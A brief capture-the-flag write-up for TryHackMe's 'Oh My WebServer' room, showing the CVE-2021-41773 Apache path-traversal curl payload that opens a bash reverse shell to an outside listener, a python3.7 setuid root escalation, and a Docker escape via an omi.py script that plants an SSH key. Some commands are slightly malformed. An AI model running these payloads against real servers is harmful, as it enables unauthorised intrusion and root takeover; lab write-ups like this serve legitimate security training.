Can you root me?
Oh My WebServer is a CTF medium from TryHackme. You have to exploit a well-known flaw in Apache 2.4.49 and then escape from Docker.
nmap -T5 -p- -sVC 10.10.242.208
On port 80, there is Apache 2 running with version 2.4.49. There is a well known and easy to exploit vulnerability. CVE-2021-41773
Exploiting this flaw is very simple. Just make a curl request to /cgi-bin to get a reverse shell.
curl -v ‘http://10.10.242.208:80/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash’ -d ‘echo Content-Type: text/plain; echo; /bin/bash -i >& /dev/tcp/10.11.38.124/4848 0>&1’ -H “Content-Type: text/plain”
We land in a Docker container as we can see with the command ls -al /
python3.7 a des capabilities setuid.
getcap -r 2>/dev/null
The gtfobins web site gives us a way to use this configuration to switch to the root account.
/usr/bin/python3.7 -c ‘import os; os.setuid(0); os.system(“/bin/sh”)’
In the /tmp folder is an omi.py file. It is thanks to this that one has the possibility of leaving the container and obtaining root rights.
/usr/bin/python3.7 omi.py -t 10.10.242.208 -c ‘cat /root/flag.txt’
Sorry, the capture is not complete on command line.
It is also possible to insert a public key in the file /root/.ssh/authorized_keys
Command to create a private/public key pair: :
usr/bin/python3.7 omi.py -t 10.10.242.208 -c ‘echo public key here’ >> /root/.ssh/authorized_keys
Then connect with this command :
ssh firstname.lastname@example.org -i id_rsa
That’s all folks
Thank you for taking the trouble to come to the site to read this Write-Up
I hope he has more of you and that he taught you new things.
Feel free to leave a comment or share this article.